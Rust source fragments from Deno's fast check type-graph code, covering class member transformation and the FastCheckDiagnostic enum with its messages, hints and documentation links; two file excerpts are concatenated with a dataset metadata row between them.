{
self.mark_diagnostic(FastCheckDiagnostic::UnsupportedUsing {
range: self.source_range_to_range(
n.decls
.first()
.map(|n| n.range())
.unwrap_or_else(|| n.range()),
),
})?;
}
Ok(TransformItemResult::Remove)
}
}
}
  /// Transforms a class in place: validates the super class expression,
  /// prunes/normalizes its members and — if the class had `#private`
  /// members — inserts a synthetic private marker property.
  fn transform_class(
    &mut self,
    n: &mut Class,
    comments: &mut CommentsMut,
    is_ambient: bool,
  ) -> Result<(), Vec<FastCheckDiagnostic>> {
    if is_ambient {
      // ignore private computed members
      n.body.retain(|m| !is_ts_private_computed_class_member(m));
      return Ok(());
    }
    let mut members = Vec::with_capacity(n.body.len());
    let mut had_private = false;
    // only identifier/member-expression super classes can be represented
    if let Some(super_class) = &n.super_class
      && !is_expr_ident_or_member_idents(super_class)
    {
      self.mark_diagnostic(FastCheckDiagnostic::UnsupportedSuperClassExpr {
        range: self.source_range_to_range(n.super_class.range()),
      })?;
    }
    let mut insert_members = Vec::new();
    let mut had_private_constructor = false;
    let mut seen_ts_private_methods = HashSet::new();
    for mut member in std::mem::take(&mut n.body) {
      // track `#name` members — they trigger the private marker below
      had_private = had_private
        || matches!(
          member,
          ClassMember::PrivateMethod(_)
            | ClassMember::PrivateProp(_)
            | ClassMember::AutoAccessor(AutoAccessor {
              key: Key::Private(_),
              ..
            })
        );
      let mut retain = !is_ts_private_computed_class_member(&member);
      if retain {
        // do some extra checks to see whether it should be removed
        if let ClassMember::Constructor(ctor) = &member {
          if ctor.accessibility == Some(Accessibility::Private) {
            // only the first private constructor with a body (or any, when
            // ambient) is kept; overload signatures are dropped
            if had_private_constructor {
              retain = false;
            } else if is_ambient || ctor.body.is_some() {
              had_private_constructor = true;
            } else {
              retain = false;
            }
          }
        } else if let ClassMember::Method(method) = &member
          && method.accessibility == Some(Accessibility::Private)
        {
          // deduplicate TS-private methods by key text (HashSet::insert
          // returns false for a repeat); computed keys are dropped
          let key = match &method.key {
            PropName::Ident(i) => Some(i.sym.to_string()),
            PropName::Str(s) => Some(s.value.to_string_lossy().to_string()),
            PropName::Num(n) => Some(
              n.raw
                .as_ref()
                .map(|r| r.to_string())
                .unwrap_or_else(|| n.value.to_string()),
            ),
            PropName::Computed(_) => None,
            PropName::BigInt(n) => Some(
              n.raw
                .as_ref()
                .map(|r| r.to_string())
                .unwrap_or_else(|| n.value.to_string()),
            ),
          };
          retain = match key {
            Some(key) => seen_ts_private_methods.insert(key),
            None => false,
          };
        }
      }
      if retain {
        retain = self.transform_class_member(
          &mut member,
          &mut insert_members,
          is_ambient,
        )?;
      }
      if retain {
        members.push(member);
      } else {
        // drop the removed member's leading comments as well
        comments.remove_leading(member.start());
      }
    }
    if had_private {
      // insert a `#private: unknown` marker as the first member —
      // presumably so the output class still reflects the presence of
      // private state; confirm intent against fast check docs
      insert_members.insert(
        0,
        ClassMember::PrivateProp(PrivateProp {
          span: DUMMY_SP,
          key: PrivateName {
            span: DUMMY_SP,
            name: "private".into(),
          },
          ctxt: SyntaxContext::default(),
          value: None,
          type_ann: Some(Box::new(TsTypeAnn {
            span: DUMMY_SP,
            type_ann: Box::new(ts_keyword_type(
              TsKeywordTypeKind::TsUnknownKeyword,
            )),
          })),
          is_static: false,
          decorators: Default::default(),
          accessibility: Default::default(),
          is_optional: false,
          is_override: false,
          readonly: false,
          definite: true,
        }),
      )
    }
    n.body = insert_members.into_iter().chain(members).collect();
    // decorators cannot be represented in the type-only output
    n.decorators.clear();
    Ok(())
  }
fn transform_class_member(
&mut self,
member: &mut ClassMember,
insert_members: &mut Vec<ClassMember>,
is_ambient: bool,
) -> Result<bool, Vec<FastCheckDiagnostic>> {
match member {
ClassMember::Constructor(n) => {
if let Some(body) = &mut n.body {
body.stmts.retain_mut(|stmt| match stmt {
Stmt::Expr(e) => match &mut *e.expr {
Expr::Call(c) => {
if !matches!(c.callee, Callee::Super(_)) {
return false;
}
for arg in c.args.iter_mut() {
arg.expr = if arg.spread.is_some() {
paren_expr(array_as_never_array_expr())
} else {
obj_as_never_expr()
};
}
true
}
_ => false,
},
_ => false,
});
}
for param in &mut n.params {
match param {
ParamOrTsParamProp::Param(_) => {
// ignore
}
ParamOrTsParamProp::TsParamProp(prop) => {
let is_optional = match &prop.param {
TsParamPropParam::Ident(ident) => ident.optional,
TsParamPropParam::Assign(_) => false,
};
insert_members.push(ClassMember::ClassProp(ClassProp {
span: DUMMY_SP,
key: match &prop.param {
TsParamPropParam::Ident(binding_ident) => {
PropName::Ident(IdentName {
span: binding_ident.span,
sym: binding_ident.sym.clone(),
})
}
TsParamPropParam::Assign(assign) => match &*assign.left {
Pat::Ident(binding_ident) => PropName::Ident(IdentName {
span: binding_ident.span,
sym: binding_ident.sym.clone(),
}),
Pat::Array(_)
| Pat::Rest(_)
| Pat::Object(_)
| Pat::Assign(_)
| Pat::Invalid(_)
| Pat::Expr(_) => {
self.mark_diagnostic(
FastCheckDiagnostic::UnsupportedDestructuring {
range: self
.source_range_to_range(assign.left.range()),
},
)?;
return Ok(false);
}
},
},
value: None,
type_ann: if prop.accessibility == Some(Accessibility::Private)
{
Some(any_type_ann())
} else {
match &prop.param {
TsParamPropParam::Ident(ident) => ident.type_ann.clone(),
TsParamPropParam::Assign(assign) => {
let explicit_type_ann = match &*assign.left {
Pat::Ident(binding_ident) => {
binding_ident.type_ann.clone()
}
_ => None,
};
explicit_type_ann.or_else(|| {
self
.maybe_infer_type_from_expr(
&assign.right,
match prop.readonly {
true => DeclMutabilityKind::Const,
false => DeclMutabilityKind::Mutable,
},
)
.map(|type_ann| {
Box::new(TsTypeAnn {
span: DUMMY_SP,
type_ann: Box::new(type_ann),
})
})
})
}
}
},
is_static: false,
decorators: Vec::new(),
accessibility: match prop.accessibility {
Some(Accessibility::Public) | None => None,
Some(accessibility) => Some(accessibility),
},
is_abstract: false,
is_optional,
is_override: false,
readonly: prop.readonly,
declare: true,
definite: false,
}));
*param = ParamOrTsParamProp::Param(Param {
span: prop.span,
decorators: vec![],
pat: match prop.param.clone() {
TsParamPropParam::Ident(ident) => Pat::Ident(ident),
TsParamPropParam::Assign(pat) => Pat::Assign(pat),
},
});
}
}
}
if n.accessibility == Some(Accessibility::Private) {
n.params.clear();
return Ok(true);
}
let is_overload = self.public_ranges.is_impl_with_overloads(&n.range());
if is_overload {
for (i, param) in n.params.iter_mut().enumerate() {
if param.as_param().map(|p| p.pat.is_rest()).unwrap_or(false) {
*param = ParamOrTsParamProp::Param(Param {
span: DUMMY_SP,
decorators: Vec::new(),
pat: Pat::Rest(RestPat {
span: DUMMY_SP,
dot3_token: DUMMY_SP,
type_ann: Some(any_type_ann()),
arg: Box::new(Pat::Ident(BindingIdent {
id: Ident {
span: DUMMY_SP,
ctxt: SyntaxContext::default(),
sym: format!("param{}", i).into(),
optional: false,
},
type_ann: None,
})),
}),
});
} else {
*param = ParamOrTsParamProp::Param(Param {
span: DUMMY_SP,
decorators: Vec::new(),
pat: Pat::Ident(BindingIdent {
id: Ident {
span: DUMMY_SP,
ctxt: SyntaxContext::default(),
sym: format!("param{}", i).into(),
optional: true,
},
type_ann: Some(any_type_ann()),
}),
});
}
}
}
let optional_start_index =
ParamsOptionalStartIndex::build(n.params.iter().map(|p| match p {
ParamOrTsParamProp::Param(p) => &p.pat,
// should have been converted to a param
ParamOrTsParamProp::TsParamProp(_) => unreachable!(),
}));
for (i, param) in n.params.iter_mut().enumerate() {
match param {
ParamOrTsParamProp::Param(param) => {
self.handle_param_pat(
&mut param.pat,
optional_start_index.is_optional_at_index(i),
)?;
param.decorators.clear();
}
ParamOrTsParamProp::TsParamProp(_) => {
// should have been converted to a param
unreachable!();
}
}
}
Ok(true)
}
ClassMember::Method(n) => {
if n.accessibility == Some(Accessibility::Private) {
*member = ClassMember::ClassProp(ClassProp {
span: DUMMY_SP,
key: n.key.clone(),
value: None,
type_ann: Some(any_type_ann()),
is_static: n.is_static,
decorators: Vec::new(),
accessibility: Some(Accessibility::Private),
is_abstract: n.is_abstract,
is_optional: n.is_optional,
is_override: false,
readonly: false,
declare: true,
definite: false,
});
return Ok(true);
}
let is_overload = self.public_ranges.is_impl_with_overloads(&n.range());
self.transform_fn(
&mut n.function,
Some(n.key.range()),
match n.kind {
MethodKind::Method => FunctionKind::DeclarationLike,
MethodKind::Getter => FunctionKind::Getter,
MethodKind::Setter => FunctionKind::Setter,
},
is_overload,
is_ambient,
)?;
Ok(true)
}
ClassMember::ClassProp(n) => {
if n.accessibility == Some(Accessibility::Private) {
n.type_ann = Some(any_type_ann());
n.declare = true;
n.definite = false;
n.is_override = false;
n.value = None;
return Ok(true);
}
if n.type_ann.is_none() {
let inferred_type = n.value.as_ref().and_then(|e| {
self.maybe_infer_type_from_expr(
e,
match n.readonly {
true => DeclMutabilityKind::Const,
false => DeclMutabilityKind::Mutable,
},
)
});
match inferred_type {
Some(t) => {
n.type_ann = Some(Box::new(TsTypeAnn {
span: DUMMY_SP,
type_ann: Box::new(t),
}));
n.value = None;
}
None => {
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | true |
// Copyright 2018-2024 the Deno authors. MIT license.
use std::borrow::Cow;
use std::sync::Arc;
use crate::ModuleSpecifier;
use deno_ast::EmitError;
use deno_ast::SourceRange;
use deno_ast::SourceTextInfo;
use deno_ast::diagnostics::DiagnosticLevel;
use deno_ast::diagnostics::DiagnosticLocation;
use deno_ast::diagnostics::DiagnosticSnippet;
use deno_ast::diagnostics::DiagnosticSnippetHighlight;
use deno_ast::diagnostics::DiagnosticSnippetHighlightStyle;
use deno_ast::diagnostics::DiagnosticSourcePos;
use deno_ast::diagnostics::DiagnosticSourceRange;
mod cache;
mod range_finder;
mod swc_helpers;
mod transform;
mod transform_dts;
pub use cache::FastCheckCache;
pub use cache::FastCheckCacheItem;
pub use cache::FastCheckCacheKey;
pub use cache::FastCheckCacheModuleItem;
pub use cache::FastCheckCacheModuleItemDiagnostic;
pub use cache::FastCheckCacheModuleItemInfo;
pub use transform::FastCheckDtsModule;
pub use transform::FastCheckModule;
pub use transform::TransformOptions;
/// Location information attached to a fast check diagnostic: the module it
/// came from, the byte range within that module, and the module's source text
/// (kept so the diagnostic can later be rendered with a code snippet).
#[derive(Clone)]
pub struct FastCheckDiagnosticRange {
  pub specifier: ModuleSpecifier,
  pub range: SourceRange,
  pub text_info: SourceTextInfo,
}
impl std::fmt::Debug for FastCheckDiagnosticRange {
  // Manual Debug impl so the potentially very large module source text is not
  // dumped into debug output.
  fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
    f.debug_struct("FastCheckDiagnosticRange")
      .field("specifier", &self.specifier)
      .field("range", &self.range)
      .field("text_info", &"<omitted>")
      .finish()
  }
}
impl PartialEq for FastCheckDiagnosticRange {
  // Equality deliberately ignores `text_info`: two ranges are equal when they
  // point at the same specifier and the same byte range.
  fn eq(&self, other: &Self) -> bool {
    self.specifier == other.specifier
      && self.range.start == other.range.start
      && self.range.end == other.range.end
  }
}
impl Eq for FastCheckDiagnosticRange {}
impl std::hash::Hash for FastCheckDiagnosticRange {
  // Hashes exactly the fields compared in `PartialEq` so that
  // `a == b` implies `hash(a) == hash(b)`.
  fn hash<H: std::hash::Hasher>(&self, state: &mut H) {
    self.specifier.hash(state);
    self.range.start.hash(state);
    self.range.end.hash(state);
  }
}
#[derive(Debug, Clone, thiserror::Error)]
pub enum FastCheckDiagnostic {
#[error("could not resolve '{name}' referenced from '{referrer}'")]
NotFoundReference {
range: FastCheckDiagnosticRange,
name: String,
referrer: String,
},
#[error("missing explicit type in the public API")]
MissingExplicitType { range: FastCheckDiagnosticRange },
#[error("missing explicit return type in the public API")]
MissingExplicitReturnType {
range: FastCheckDiagnosticRange,
is_definitely_void_or_never: bool,
is_async: bool,
},
#[error(
"found an ambient module, which is a global augmentation, which are not unsupported"
)]
UnsupportedAmbientModule { range: FastCheckDiagnosticRange },
#[error("the reference '{name}' from '{referrer}' was too complex")]
UnsupportedComplexReference {
range: FastCheckDiagnosticRange,
name: String,
referrer: String,
},
#[error("default export expression was too complex")]
UnsupportedDefaultExportExpr { range: FastCheckDiagnosticRange },
#[error("found destructuring, which is not supported in the public API")]
UnsupportedDestructuring { range: FastCheckDiagnosticRange },
#[error(
"expando property referencing '{reference_name}' conflicts with '{object_name}.{reference_name}'"
)]
UnsupportedExpandoProperty {
object_name: String,
reference_name: String,
range: FastCheckDiagnosticRange,
},
#[error("found global augmentations, which are not supported")]
UnsupportedGlobalModule { range: FastCheckDiagnosticRange },
#[error(
"require statements are a CommonJS feature, which are not supported in ES modules"
)]
UnsupportedRequire { range: FastCheckDiagnosticRange },
#[error(
"public API member ({referrer}) is referencing or transitively referencing a class private member ({name})"
)]
UnsupportedPrivateMemberReference {
range: FastCheckDiagnosticRange,
name: String,
referrer: String,
},
#[error("super class expression was too complex")]
UnsupportedSuperClassExpr { range: FastCheckDiagnosticRange },
#[error(
"export assignments are a Common JS feature, which are not supported in ES modules"
)]
UnsupportedTsExportAssignment { range: FastCheckDiagnosticRange },
#[error(
"found namespace export, which is a global augmentation, which are not unsupported"
)]
UnsupportedTsNamespaceExport { range: FastCheckDiagnosticRange },
#[error("using declarations are not supproted in the public API")]
UnsupportedUsing { range: FastCheckDiagnosticRange },
#[error(
"referenced a JavaScript module without type declarations from a TypeScript module"
)]
UnsupportedNestedJavaScript { specifier: ModuleSpecifier },
#[error(
"used a JavaScript module without type declarations as an entrypoint"
)]
UnsupportedJavaScriptEntrypoint { specifier: ModuleSpecifier },
#[error("failed to emit fast check module: {inner:#}")]
Emit {
specifier: ModuleSpecifier,
inner: Arc<EmitError>,
},
#[error("export not found: {}", .specifier)]
ExportNotFound { specifier: ModuleSpecifier },
/// This is a special diagnostic that appears when a module is loaded from the
/// fast check cache that had a diagnostic. When we load a diagnostic from the
/// cache, we're only really interested in if there was a fast check diagnostic
/// and not what the diagnostic was because we just need to know if we can use
/// fast check for the package or not.
///
/// Note: This diagnostic will never (should never) be displayed to the user
/// because the fast check cache should not be used in deno lint or when
/// publishing.
#[error("diagnostic was cached")]
Cached { specifier: ModuleSpecifier },
}
impl FastCheckDiagnostic {
  /// Returns a human readable label describing what the diagnostic's range
  /// points at (used as the snippet highlight description).
  ///
  /// Returns `None` for diagnostics where no extra label is useful or that
  /// have no range at all. (Note: despite what an earlier comment claimed,
  /// this never panics — range-less diagnostics simply map to `None`.)
  pub fn range_description(&self) -> Option<&'static str> {
    use FastCheckDiagnostic::*;
    match self {
      NotFoundReference { .. } => Some("this is the reference"),
      MissingExplicitType { .. } => {
        Some("this symbol is missing an explicit type")
      }
      MissingExplicitReturnType { .. } => {
        Some("this function is missing an explicit return type")
      }
      UnsupportedAmbientModule { .. } => None,
      UnsupportedComplexReference { .. } => Some("this is the reference"),
      UnsupportedDefaultExportExpr { .. } => None,
      UnsupportedDestructuring { .. } => None,
      UnsupportedExpandoProperty { .. } => None,
      UnsupportedGlobalModule { .. } => None,
      UnsupportedRequire { .. } => None,
      UnsupportedPrivateMemberReference { .. } => Some("this is the reference"),
      UnsupportedSuperClassExpr { .. } => {
        Some("this is the superclass expression")
      }
      UnsupportedTsExportAssignment { .. } => None,
      UnsupportedTsNamespaceExport { .. } => None,
      UnsupportedUsing { .. } => None,
      UnsupportedNestedJavaScript { .. } => None,
      UnsupportedJavaScriptEntrypoint { .. } => None,
      Emit { .. } => None,
      ExportNotFound { .. } => None,
      Cached { .. } => None,
    }
  }
}
impl FastCheckDiagnostic {
  /// The specifier of the module the diagnostic originated from.
  /// Every variant carries one, either directly or via its range.
  pub fn specifier(&self) -> &ModuleSpecifier {
    use FastCheckDiagnostic::*;
    match self {
      NotFoundReference { range, .. } => &range.specifier,
      MissingExplicitType { range } => &range.specifier,
      MissingExplicitReturnType { range, .. } => &range.specifier,
      UnsupportedAmbientModule { range } => &range.specifier,
      UnsupportedComplexReference { range, .. } => &range.specifier,
      UnsupportedDefaultExportExpr { range } => &range.specifier,
      UnsupportedDestructuring { range } => &range.specifier,
      UnsupportedExpandoProperty { range, .. } => &range.specifier,
      UnsupportedGlobalModule { range } => &range.specifier,
      UnsupportedPrivateMemberReference { range, .. } => &range.specifier,
      UnsupportedRequire { range } => &range.specifier,
      UnsupportedSuperClassExpr { range } => &range.specifier,
      UnsupportedTsExportAssignment { range } => &range.specifier,
      UnsupportedTsNamespaceExport { range } => &range.specifier,
      UnsupportedUsing { range } => &range.specifier,
      UnsupportedJavaScriptEntrypoint { specifier } => specifier,
      UnsupportedNestedJavaScript { specifier } => specifier,
      Emit { specifier, .. } => specifier,
      ExportNotFound { specifier, .. } => specifier,
      Cached { specifier, .. } => specifier,
    }
  }
  /// The source range of the diagnostic, when it has one.
  /// Module-level diagnostics (ex. emit failures, cached entries) have none.
  pub fn range(&self) -> Option<&FastCheckDiagnosticRange> {
    use FastCheckDiagnostic::*;
    match self {
      NotFoundReference { range, .. } => Some(range),
      MissingExplicitType { range } => Some(range),
      MissingExplicitReturnType { range, .. } => Some(range),
      UnsupportedAmbientModule { range } => Some(range),
      UnsupportedComplexReference { range, .. } => Some(range),
      UnsupportedDefaultExportExpr { range } => Some(range),
      UnsupportedDestructuring { range } => Some(range),
      UnsupportedExpandoProperty { range, .. } => Some(range),
      UnsupportedGlobalModule { range } => Some(range),
      UnsupportedPrivateMemberReference { range, .. } => Some(range),
      UnsupportedRequire { range } => Some(range),
      UnsupportedSuperClassExpr { range } => Some(range),
      UnsupportedTsExportAssignment { range } => Some(range),
      UnsupportedTsNamespaceExport { range } => Some(range),
      UnsupportedUsing { range } => Some(range),
      UnsupportedJavaScriptEntrypoint { .. } => None,
      UnsupportedNestedJavaScript { .. } => None,
      Emit { .. } => None,
      ExportNotFound { .. } => None,
      Cached { .. } => None,
    }
  }
}
// Integration with deno_ast's diagnostic rendering. The only behavioral
// changes below are grammar fixes to four user-facing strings that read
// "you don't be seeing it" (now "you shouldn't be seeing it").
impl deno_ast::diagnostics::Diagnostic for FastCheckDiagnostic {
  fn level(&self) -> DiagnosticLevel {
    use FastCheckDiagnostic::*;
    match self {
      NotFoundReference { .. }
      | MissingExplicitType { .. }
      | MissingExplicitReturnType { .. }
      | UnsupportedAmbientModule { .. }
      | UnsupportedComplexReference { .. }
      | UnsupportedDefaultExportExpr { .. }
      | UnsupportedDestructuring { .. }
      | UnsupportedExpandoProperty { .. }
      | UnsupportedGlobalModule { .. }
      | UnsupportedRequire { .. }
      | UnsupportedPrivateMemberReference { .. }
      | UnsupportedSuperClassExpr { .. }
      | UnsupportedTsExportAssignment { .. }
      | UnsupportedTsNamespaceExport { .. }
      | UnsupportedUsing { .. }
      | UnsupportedNestedJavaScript { .. }
      | Emit { .. }
      | ExportNotFound { .. }
      | Cached { .. } => DiagnosticLevel::Error,
      // a JS entrypoint only disables fast check; it is not fatal
      UnsupportedJavaScriptEntrypoint { .. } => DiagnosticLevel::Warning,
    }
  }
  /// Stable machine-readable code; also used to build the docs URL below.
  fn code(&self) -> Cow<'_, str> {
    // WARNING: When adding a code, make sure to update jsr
    use FastCheckDiagnostic::*;
    Cow::Borrowed(match self {
      NotFoundReference { .. } => "not-found-reference",
      MissingExplicitType { .. } => "missing-explicit-type",
      MissingExplicitReturnType { .. } => "missing-explicit-return-type",
      UnsupportedAmbientModule { .. } => "unsupported-ambient-module",
      UnsupportedComplexReference { .. } => "unsupported-complex-reference",
      UnsupportedDefaultExportExpr { .. } => "unsupported-default-export-expr",
      UnsupportedDestructuring { .. } => "unsupported-destructuring",
      UnsupportedExpandoProperty { .. } => "unsupported-expando-property",
      UnsupportedGlobalModule { .. } => "unsupported-global-module",
      UnsupportedRequire { .. } => "unsupported-require",
      UnsupportedPrivateMemberReference { .. } => {
        "unsupported-private-member-reference"
      }
      UnsupportedSuperClassExpr { .. } => "unsupported-super-class-expr",
      UnsupportedTsExportAssignment { .. } => {
        "unsupported-ts-export-assignment"
      }
      UnsupportedTsNamespaceExport { .. } => "unsupported-ts-namespace-export",
      UnsupportedUsing { .. } => "unsupported-using",
      UnsupportedNestedJavaScript { .. } => "unsupported-nested-javascript",
      UnsupportedJavaScriptEntrypoint { .. } => {
        "unsupported-javascript-entrypoint"
      }
      Emit { .. } => "emit",
      ExportNotFound { .. } => "export-not-found",
      Cached { .. } => "cached",
    })
  }
  fn message(&self) -> Cow<'_, str> {
    // the thiserror `#[error]` attribute provides Display
    Cow::Owned(self.to_string())
  }
  fn location(&self) -> deno_ast::diagnostics::DiagnosticLocation<'_> {
    // point at the exact position when a range exists; otherwise just
    // reference the module
    match self.range() {
      Some(range) => DiagnosticLocation::ModulePosition {
        specifier: Cow::Borrowed(self.specifier()),
        text_info: Cow::Borrowed(&range.text_info),
        source_pos: DiagnosticSourcePos::SourcePos(range.range.start),
      },
      None => DiagnosticLocation::Module {
        specifier: Cow::Borrowed(self.specifier()),
      },
    }
  }
  fn snippet(&self) -> Option<deno_ast::diagnostics::DiagnosticSnippet<'_>> {
    self.range().map(|range| DiagnosticSnippet {
      source: Cow::Borrowed(&range.text_info),
      highlights: vec![DiagnosticSnippetHighlight {
        style: DiagnosticSnippetHighlightStyle::Error,
        range: DiagnosticSourceRange {
          start: DiagnosticSourcePos::SourcePos(range.range.start),
          end: DiagnosticSourcePos::SourcePos(range.range.end),
        },
        description: self.range_description().map(Cow::Borrowed),
      }],
    })
  }
  /// A one-line actionable suggestion for fixing the diagnostic.
  fn hint(&self) -> Option<Cow<'_, str>> {
    use FastCheckDiagnostic::*;
    Some(match self {
      NotFoundReference { .. } => {
        Cow::Borrowed("fix the reference to point to a symbol that exists")
      }
      MissingExplicitType { .. } => {
        Cow::Borrowed("add an explicit type annotation to the symbol")
      }
      MissingExplicitReturnType {
        is_definitely_void_or_never,
        is_async,
        ..
      } => {
        if *is_definitely_void_or_never {
          Cow::Borrowed(
            "add an explicit return type of 'void' or 'never' to the function",
          )
        } else if *is_async {
          Cow::Borrowed(
            "add an explicit return type of 'Promise<void>' or 'Promise<never>' to the function",
          )
        } else {
          Cow::Borrowed("add an explicit return type to the function")
        }
      }
      UnsupportedAmbientModule { .. } => {
        Cow::Borrowed("remove the ambient module declaration")
      }
      UnsupportedComplexReference { .. } => Cow::Borrowed(
        "extract the shared type to a type alias and reference the type alias instead",
      ),
      UnsupportedDefaultExportExpr { .. } => Cow::Borrowed(
        "add an 'as' clause with an explicit type after the expression, or extract to a variable",
      ),
      UnsupportedDestructuring { .. } => Cow::Borrowed(
        "separate each destructured symbol into its own export statement",
      ),
      UnsupportedExpandoProperty { reference_name, .. } => Cow::Owned(format!(
        "rename '{}' to something else to avoid conflicts or create a temporary variable with a different name to use in the expando property reference",
        reference_name
      )),
      UnsupportedGlobalModule { .. } => {
        Cow::Borrowed("remove the 'global' augmentation")
      }
      UnsupportedRequire { .. } => {
        Cow::Borrowed("use an import statement instead")
      }
      UnsupportedPrivateMemberReference { .. } => Cow::Borrowed(
        "extract the type of the private member to a type alias and reference the type alias instead",
      ),
      UnsupportedSuperClassExpr { .. } => {
        Cow::Borrowed("extract the superclass expression into a variable")
      }
      UnsupportedTsExportAssignment { .. } => {
        Cow::Borrowed("use an export statement instead")
      }
      UnsupportedTsNamespaceExport { .. } => {
        Cow::Borrowed("remove the namespace export")
      }
      UnsupportedUsing { .. } => {
        Cow::Borrowed("use 'const' instead of 'using'")
      }
      UnsupportedNestedJavaScript { .. } => Cow::Borrowed(
        "add a type declaration (d.ts) for the JavaScript module, or rewrite it to TypeScript",
      ),
      UnsupportedJavaScriptEntrypoint { .. } => Cow::Borrowed(
        "add a type declaration (d.ts) for the JavaScript module, or rewrite it to TypeScript",
      ),
      Emit { .. } => Cow::Borrowed(
        "this error may be the result of a bug in Deno - if you think this is the case, please open an issue",
      ),
      // only a bug if the user sees these
      // (grammar fixed: was "you don't be seeing it")
      ExportNotFound { .. } => Cow::Borrowed(
        "this error is the result of a bug in Deno and you shouldn't be seeing it - please open an issue if one doesn't exist",
      ),
      Cached { .. } => Cow::Borrowed(
        "this error is the result of a bug in Deno and you shouldn't be seeing it - please open an issue if one doesn't exist",
      ),
    })
  }
  fn snippet_fixed(
    &self,
  ) -> Option<deno_ast::diagnostics::DiagnosticSnippet<'_>> {
    // fast check diagnostics never provide an auto-fix snippet
    None
  }
  /// Additional explanatory lines shown below the message.
  fn info(&self) -> std::borrow::Cow<'_, [std::borrow::Cow<'_, str>]> {
    use FastCheckDiagnostic::*;
    match self {
      NotFoundReference { .. } => Cow::Borrowed(&[Cow::Borrowed(
        "this error may be the result of a bug in Deno - if you think this is the case, please open an issue",
      )]),
      MissingExplicitType { .. } => Cow::Borrowed(&[Cow::Borrowed(
        "all symbols in the public API must have an explicit type",
      )]),
      MissingExplicitReturnType {
        is_definitely_void_or_never,
        is_async,
        ..
      } => {
        let mut lines = vec![Cow::Borrowed(
          "all functions in the public API must have an explicit return type",
        )];
        if *is_definitely_void_or_never {
          if *is_async {
            lines.push(Cow::Borrowed("async function expressions without a return statement can have a return type of either 'Promise<void>' or 'Promise<never>'"));
          } else {
            lines.push(Cow::Borrowed("function expressions without a return statement can have a return type of either 'void' or 'never'"));
          }
          lines.push(Cow::Borrowed("this function has no return statements, so a return type could not be inferred automatically"));
        }
        Cow::Owned(lines)
      }
      UnsupportedAmbientModule { .. } => Cow::Borrowed(&[Cow::Borrowed(
        "ambient modules are not supported because they can modify the types of a module from outside of that module",
      )]),
      UnsupportedComplexReference { .. } => Cow::Borrowed(&[Cow::Borrowed(
        "the reference was too complex to be resolved by fast check",
      )]),
      UnsupportedDefaultExportExpr { .. } => Cow::Borrowed(&[Cow::Borrowed(
        "fast check was unable to infer the type of the default export expression",
      )]),
      UnsupportedDestructuring { .. } => Cow::Borrowed(&[Cow::Borrowed(
        "destructuring can not be inferred by fast check",
      )]),
      UnsupportedExpandoProperty { .. } => Cow::Borrowed(&[Cow::Borrowed(
        "expando properties get converted to a namespace and the reference conflicts with a namespace export",
      )]),
      UnsupportedGlobalModule { .. } => Cow::Borrowed(&[Cow::Borrowed(
        "global augmentations are not supported because they can modify global types, which can affect other modules type checking",
      )]),
      UnsupportedRequire { .. } => Cow::Borrowed(&[Cow::Borrowed(
        "CommonJS features such as require are not supported in ES modules",
      )]),
      UnsupportedPrivateMemberReference { .. } => Cow::Borrowed(&[
        Cow::Borrowed(
          "private members can not be referenced from public API members",
        ),
        Cow::Borrowed(
          "this is because fast check removes private members from the types",
        ),
      ]),
      UnsupportedSuperClassExpr { .. } => Cow::Borrowed(&[Cow::Borrowed(
        "fast check was unable to infer the type of the superclass expression",
      )]),
      UnsupportedTsExportAssignment { .. } => Cow::Borrowed(&[Cow::Borrowed(
        "CommonJS features such as export assignments are not supported in ES modules",
      )]),
      UnsupportedTsNamespaceExport { .. } => Cow::Borrowed(&[Cow::Borrowed(
        "namespace exports are not supported because they can modify the types of a module from outside of that module",
      )]),
      UnsupportedUsing { .. } => Cow::Borrowed(&[
        Cow::Borrowed(
          "using declarations have unclear semantics in the public API",
        ),
        Cow::Borrowed("they are thus not supported in the public API"),
      ]),
      UnsupportedNestedJavaScript { .. } => Cow::Borrowed(&[
        Cow::Borrowed(
          "JavaScript files with no corresponding declaration require type inference to be type checked",
        ),
        Cow::Borrowed(
          "fast check avoids type inference, so referencing a JavaScript file with no type declarations is not supported",
        ),
      ]),
      UnsupportedJavaScriptEntrypoint { .. } => Cow::Borrowed(&[
        Cow::Borrowed(
          "JavaScript files with no corresponding declaration require type inference to be type checked",
        ),
        Cow::Borrowed(
          "fast check avoids type inference, so JavaScript entrypoints should be avoided",
        ),
      ]),
      Emit { .. } => Cow::Borrowed(&[Cow::Borrowed(
        "this error may be the result of a bug in Deno - if you think this is the case, please open an issue",
      )]),
      // only a bug if the user sees these
      // (grammar fixed: was "you don't be seeing it")
      ExportNotFound { .. } => Cow::Borrowed(&[Cow::Borrowed(
        "this error is the result of a bug in Deno and you shouldn't be seeing it - please open an issue if one doesn't exist",
      )]),
      Cached { .. } => Cow::Borrowed(&[Cow::Borrowed(
        "this error is the result of a bug in Deno and you shouldn't be seeing it - please open an issue if one doesn't exist",
      )]),
    }
  }
  fn docs_url(&self) -> Option<Cow<'_, str>> {
    Some(Cow::Owned(format!(
      "https://jsr.io/go/slow-type-{}",
      self.code()
    )))
  }
}
/// Builds fast check modules for all packages reachable from `pending_nvs`,
/// returning a `(specifier, result)` pair per public module. When a
/// `fast_check_cache` is provided, freshly computed results (or diagnostics)
/// are written back to it, and previously cached packages are reused as-is.
#[cfg(feature = "fast_check")]
pub fn build_fast_check_type_graph<'a>(
  fast_check_cache: Option<&'a dyn FastCheckCache>,
  jsr_url_provider: &'a dyn crate::source::JsrUrlProvider,
  graph: &'a crate::ModuleGraph,
  root_symbol: &'a crate::symbols::RootSymbol<'a>,
  pending_nvs: std::collections::VecDeque<deno_semver::package::PackageNv>,
  options: &TransformOptions,
) -> Vec<(
  crate::ModuleSpecifier,
  Result<FastCheckModule, Vec<FastCheckDiagnostic>>,
)> {
  use crate::fast_check::cache::fast_insecure_hash;
  // dts output is never cached; drop the cache rather than mixing the two
  let fast_check_cache = if options.dts && fast_check_cache.is_some() {
    debug_assert!(false, "using fast check cache with dts is not supported");
    None
  } else {
    fast_check_cache
  };
  let public_modules = range_finder::find_public_ranges(
    fast_check_cache,
    jsr_url_provider,
    graph,
    root_symbol,
    options.workspace_members,
    pending_nvs,
  );
  let mut final_result = Vec::new();
  for (nv, package) in public_modules {
    log::debug!("Analyzing '{}' for fast check", nv);
    let mut errors = Vec::new();
    let mut fast_check_modules =
      Vec::with_capacity(package.module_ranges.len());
    // empty cache_items means the package was not found in the cache and
    // must be transformed now
    if package.cache_items.is_empty() {
      transform_package(
